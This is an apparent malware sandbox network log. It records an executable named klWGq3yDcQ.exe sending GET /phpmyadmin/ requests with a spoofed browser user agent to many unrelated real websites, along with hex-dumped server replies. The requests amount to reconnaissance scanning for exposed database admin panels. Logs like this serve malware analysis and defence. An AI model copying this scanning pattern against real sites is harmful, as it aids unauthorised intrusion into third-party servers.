                                                                                                                                                                                                    2023-11-26 05:59:28 UTC707INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helv


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    2192.168.2.4503333.234.162.1434436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: t1eng.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC416INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 70 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 31 32 33 38 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 38 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 4c 69 74 65 53 70 65 65 64 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Sun, 26 Nov 2023 05:59:28 GMTserver: LiteSpeedalt-svc: h3=":443";
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC286INData Raw: 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73
                                                                                                                                                                                                    Data Ascii: br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    3192.168.2.4501363.111.240.64436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: knu.ac.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC217INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheLocation: https://www.knu.ac.in/phpmyadmin/Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC301INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 6e 75 2e 61 63 2e 69 6e 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.knu.ac.in/phpmyadmin/">here</a>.</p><hr><address>Apache Server a


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    4192.168.2.45067123.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC625INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 61 2d 37 63
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/phpmyadmin/Server: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-a-7c


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    5192.168.2.450603159.203.32.44436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC179OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: jamiesonmullin.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC176INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 32 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 3029Connection: closeContent-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC3029INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><meta content="IE=edge" http-equiv="X-UA-Compatible"> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, viewport-fit=cover" name="viewport"> <meta con


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    6192.168.2.450766162.241.224.2184436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC172OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gasp-ga.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC404INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 34 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 67 61 73 70 2d 67 61 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:24 GMTServer: nginx/1.21.6Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://gasp-ga.com/wp-json/>; r
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC7788INData Raw: 31 65 33 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 0a 3c 21 2d 2d 20 68 65 61 64 20 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 21 2d 2d 20 6d 65 74 61 20 2d 2d 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 61 73 70 2d 67 61 2e 63 6f 6d
                                                                                                                                                                                                    Data Ascii: 1e3d<!DOCTYPE html><html class="no-js" lang="en-US">... head --><head>... meta --><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><link rel="shortcut icon" href="http://gasp-ga.com
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC8159INData Raw: 38 34 2c 31 39 35 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 63 6f 6f 6c 2d 74 6f 2d 77 61 72 6d 2d 73 70 65 63 74 72 75 6d 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61
                                                                                                                                                                                                    Data Ascii: 84,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linea
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC8192INData Raw: 32 30 30 30 0d 0a 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 6e 61 76 69 67 61 74 69 6f 6e 20 61 3a 77 68 65 72 65 28 3a 6e 6f 74 28 2e 77 70 2d 65 6c 65 6d 65 6e 74 2d 62 75 74 74 6f 6e 29 29 7b 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 3b 7d 0a 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d
                                                                                                                                                                                                    Data Ascii: 2000ont-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}:where(.wp-block-post-template.is-
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC6INData Raw: 61 72 20 2e 6d 65
                                                                                                                                                                                                    Data Ascii: ar .me
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC8192INData Raw: 32 30 30 30 0d 0a 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 20 3e 20 6c 69 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 30 7d 2e 6d 6d 2d 76 65 72 74 69 63 61 6c 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 20 3e 20 6c 69 2e 68 69 64 65 2d 62 6f 72 64 65 72 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74 68 3a 30 7d 2e 6d 6d 2d 76 65 72 74 69 63 61 6c 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 20 3e 20 6c 69 20 61 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 30 3b 70 61 64 64 69 6e 67 3a 39 70 78 20 31 35 70 78 3b
                                                                                                                                                                                                    Data Ascii: 2000nu > li > ul.mfn-megamenu > li:last-child{border-right-width:0}.mm-vertical #Top_bar .menu > li > ul.mfn-megamenu > li.hide-border{border-right-width:0}.mm-vertical #Top_bar .menu > li > ul.mfn-megamenu > li a{border-bottom-width:0;padding:9px 15px;
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC6INData Raw: 63 72 65 61 74 69
                                                                                                                                                                                                    Data Ascii: creati
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    7192.168.2.4509333.33.130.1904436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: mdystudent.net
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC719INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 35 3a 30 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 61 61 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:29 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:35:06 GMTConnection: closeETag: "6552b2aa-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC1177INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f
                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    8192.168.2.450997144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:28 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
